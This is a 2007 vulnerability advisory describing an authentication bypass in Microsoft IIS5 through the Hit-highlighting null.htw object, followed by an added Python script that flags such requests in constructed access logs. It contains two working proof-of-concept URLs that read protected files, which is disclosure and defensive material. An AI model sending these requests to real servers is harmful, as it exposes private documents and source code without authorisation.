isa-2006-013.txt

Published: 23 May 2007. Reported by Jesus Olmos Gonzalez. Source: packetstorm (packetstormsecurity.com)

Microsoft IIS5 NTLM and Basic authentication vulnerability

=============================================  
INTERNET SECURITY AUDITORS ALERT 2006-013  
- Original release date: December 15, 2006  
- Last revised: May 22, 2007  
- Discovered by: Jesus Olmos Gonzalez  
- Severity: 5/5  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Microsoft IIS5 NTLM and Basic authentication bypass  
  
II. BACKGROUND  
-------------------------  
Microsoft Internet Information Server Web Server can protect the  
private contents with a basic or NTLM authentication.  
  
Many web pages, intranets and extranets rely on Microsoft security.  
  
IISv5 has a "Hit-highlighting" feature that opens a site object and  
highlights part of it; this feature has had a directory traversal  
vulnerability in the past. Now it can be used to bypass IIS  
authentication.  
  
This is poorly documented in the Knowledge Base article  
http://support.microsoft.com/kb/328832; the real impact is detailed below.  
  
III. DESCRIPTION  
-------------------------  
Any Internet user can access the private web directories and files of  
any IISv5 web site by highlighting them with "Hit-highlighting". To use  
this functionality the user has to supply the CiWebhitsfile parameter  
to the null.htw object.  
  
The null.htw object has to be accessed from a non-existent directory,  
for example http://anyiisweb.com/foo/null.htw  
  
It is possible to use null.htw or another object specified in the  
CiTemplate template.  
  
IV. PROOF OF CONCEPT  
-------------------------  
https://anyiis5.com/authBypass/null.htw?CiWebhitsfile=/protectedfile.aspx&CiRestriction=b&CiHiliteType=full  
https://anyiis5.com/authBypass/null.htw?CiWebhitsfile=/some/secretfile.txt&CiRestriction=b&CiHiliteType=full  
  
V. BUSINESS IMPACT  
-------------------------  
The impact depends on the web contents. Attackers could gain access to  
all protected documents, and ASP code.  
  
Once an attacker has access to a trusted zone, the probability of  
obtaining command execution is higher.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Internet Information Services Version 5, any Service Pack.  
  
VII. SOLUTION  
-------------------------  
Protect the files with NTFS filesystem permissions instead of relying  
on the IIS authentication.  
  
Microsoft recommends not using IISv5 and upgrading to IISv6.  
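The advisory's primitive is a request to a .htw object carrying a CiWebhitsfile parameter that names another file. The following added example (not part of the ISA advisory) flags such requests in IIS W3C extended log lines so they stand out when reviewing access logs; the log lines, hostnames and addresses are constructed, and the field layout (date, time, c-ip, cs-method, cs-uri-stem, cs-uri-query, sc-status) is an assumption about how the log was configured.

```python
from urllib.parse import parse_qs

# Constructed sample log lines in W3C extended format, assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2007-05-22 10:01:02 203.0.113.7 GET /default.htm - 200
2007-05-22 10:01:05 203.0.113.7 GET /authBypass/null.htw CiWebhitsfile=/protectedfile.aspx&CiRestriction=b&CiHiliteType=full 200
2007-05-22 10:01:09 198.51.100.3 GET /private/report.aspx - 401
2007-05-22 10:01:11 203.0.113.7 GET /foo/null.htw CiWebhitsfile=/some/secretfile.txt&CiRestriction=b&CiHiliteType=full 200
2007-05-22 10:01:15 198.51.100.9 GET /search/query.htw ciwebhitsfile=/help.htm&CiRestriction=iis 200
"""


def parse_w3c_line(line):
    """Split one W3C extended log line into a dict; '-' means an empty field."""
    date, time, c_ip, method, stem, query, status = line.split(" ", 6)
    return {"date": date, "time": time, "c_ip": c_ip, "method": method,
            "stem": stem, "query": "" if query == "-" else query,
            "status": int(status)}


def hit_highlight_requests(log_text):
    """Return every request that asks a .htw object to open another file via
    CiWebhitsfile.  Parameter names are compared case-insensitively because
    IIS query strings are not case-sensitive.  Each hit records the client,
    the .htw path used, the file it tried to expose and the response code."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = parse_w3c_line(line)
        if not entry["stem"].lower().endswith(".htw"):
            continue
        params = {k.lower(): v for k, v in parse_qs(entry["query"]).items()}
        targets = params.get("ciwebhitsfile")
        if not targets:
            continue
        hits.append({"c_ip": entry["c_ip"], "htw": entry["stem"],
                     "target": targets[0], "status": entry["status"]})
    return hits


if __name__ == "__main__":
    for h in hit_highlight_requests(SAMPLE_LOG):
        print(f"{h['c_ip']} used {h['htw']} to open {h['target']} (HTTP {h['status']})")
```

A hit whose target lies under a directory protected only by IIS authentication and that returned HTTP 200 is the case the advisory describes.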
  
VIII. REFERENCES  
-------------------------  
http://support.microsoft.com/kb/328832  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported  
by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com)  
  
X. REVISION HISTORY  
-------------------------  
December 15, 2006: Initial release  
March 19, 2007: Latest revision  
March 27, 2007: First notification to the vendor.  
Response: under revision.  
April 11, 2007: The vendor considers only minor changes to its KB article.  
April 12, 2007: We accept this and propose adding comments about the  
severity of the problem. Rejected by the vendor.  
May 21, 2007: Published, as the information published by the vendor is  
considered insufficiently detailed.  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
December 15, 2006: Vulnerability acquired by  
Jesus Olmos Gonzalez (Internet Security Auditors)  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors, S.L. accepts no responsibility for any  
damage caused by the use or misuse of this information.  

